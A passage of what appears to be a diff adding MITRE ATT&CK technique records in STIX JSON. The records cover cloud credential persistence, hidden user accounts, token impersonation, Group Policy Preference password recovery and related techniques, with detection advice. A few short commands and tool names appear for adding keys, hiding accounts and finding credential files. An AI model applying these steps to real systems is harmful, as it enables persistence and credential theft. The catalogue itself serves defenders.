"https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/" + }, + { + "source_name": "GitHub Phishery", + "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.", + "url": "https://github.com/ryhanson/phishery" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-28T14:35:00.862Z", + "name": "Additional Cloud Credentials", + "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) \n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation Persistence)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Expel", + "Oleg Kolesnikov, Securonix", + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)", + "Zur Ulianitzky, XM Cyber", + "Alex Soler, AttackIQ", + "Dylan Silva, AWS Security", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Azure AD", + "SaaS" + ], + "x_mitre_version": "2.7", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "created": "2020-01-19T16:10:15.008Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/001", + "external_id": "T1098.001" + }, + { + "source_name": "Crowdstrike AWS User Federation Persistence", + "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.", + "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/" + }, + { + "source_name": "Expel IO Evil in AWS", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", + "url": "https://expel.io/blog/finding-evil-in-aws/" + }, + { + "source_name": "SpecterOps Azure Privilege Escalation", + "description": "Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.", + "url": "https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5" + }, + { + "source_name": "Demystifying Azure AD Service Principals", + "description": "Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.", + "url": "https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/" + }, + { + "source_name": "GCP SSH Key Add", + "description": "Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.", + "url": "https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add" + }, + { + "source_name": "Blue Cloud of Death Video", + "description": "Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.", + "url": "https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815" + }, + { + "source_name": "Blue Cloud of Death", + "description": "Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.", + "url": "https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1" + }, + { + "source_name": "Microsoft SolarWinds Customer Guidance", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Expel Behind the Scenes", + "description": "S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.", + "url": "https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/" + }, + { + "source_name": "Sysdig ScarletEel 2.0", + "description": "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12, 2023.", + "url": "https://sysdig.com/blog/scarleteel-2-0/" + }, + { + "source_name": "Rhino Security Labs AWS Privilege Escalation", + "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.", + "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:07.653Z", + "name": "Default Credentials", + "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0812", + "external_id": "T0812" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T03:46:49.507Z", + "name": "User Execution", + "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nFor example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "IaaS", + "Containers" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204", + "external_id": "T1204" + }, + { + "source_name": "Krebs Discord Bookmarks 2023", + "description": "Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.", + "url": "https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/" + }, + { + "source_name": "Telephone Attack Delivery", + "description": "Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery" + }, + { + "source_name": "Talos Roblox Scam 2023", + "description": "Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.", + "url": "https://blog.talosintelligence.com/roblox-scam-overview/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Internal Defacement", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "created": "2020-02-20T14:31:34.778Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1491/001", + "external_id": "T1491.001" + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Hidden Users", + "description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account) \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Omkar Gudhate" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. \n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList key.\n\nIn macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the Hide500Users key value to TRUE in the /Library/Preferences/com.apple.loginwindow plist file. Monitor the command line for usage of the dscl . create command with the IsHidden attribute set to 1.(Citation: Apple Support Hide a User Account) ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "created": "2020-03-13T20:12:40.876Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/002", + "external_id": "T1564.002" + }, + { + "source_name": "Cybereason OSX Pirrit", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + }, + { + "source_name": "Apple Support Hide a User Account", + "description": "Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.", + "url": "https://support.apple.com/en-us/HT203998" + }, + { + "source_name": "FireEye SMOKEDHAM June 2021", + "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" + }, + { + "source_name": "Hide GDM User Accounts", + "description": "Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.", + "url": "https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/" + }, + { + "source_name": "US-CERT TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-10T17:55:46.905Z", + "name": "Make and Impersonate Token", + "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jonny Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control", + "System access controls", + "File system access controls" + ], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "created": "2020-02-18T18:03:37.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/003", + "external_id": "T1134.003" + }, + { + "source_name": "Microsoft Command-line Logging", + "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", + "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" + }, + { + "source_name": "LogonUserW function", + "description": "Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:07.840Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Logon Session: Logon Session Metadata", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0822", + "external_id": "T0822" + }, + { + "source_name": "Daniel Oakley, Travis Smith, Tripwire", + "description": "Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Group Policy Preferences", + "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "created": "2020-02-11T18:43:06.253Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/006", + "external_id": "T1552.006" + }, + { + "source_name": "Microsoft GPP 2016", + "description": "Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)" + }, + { + "source_name": "Microsoft GPP Key", + "description": "Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.", + "url": "https://msdn.microsoft.com/library/cc422924.aspx" + }, + { + "source_name": "Obscuresecurity Get-GPPPassword", + "description": "Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.", + "url": "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html" + }, + { + "source_name": "ADSecurity Finding Passwords in SYSVOL", + "description": "Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.", + "url": "https://adsecurity.org/?p=2288" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Control Panel Items", + "description": "Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nAdversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor and analyze activity related to items associated 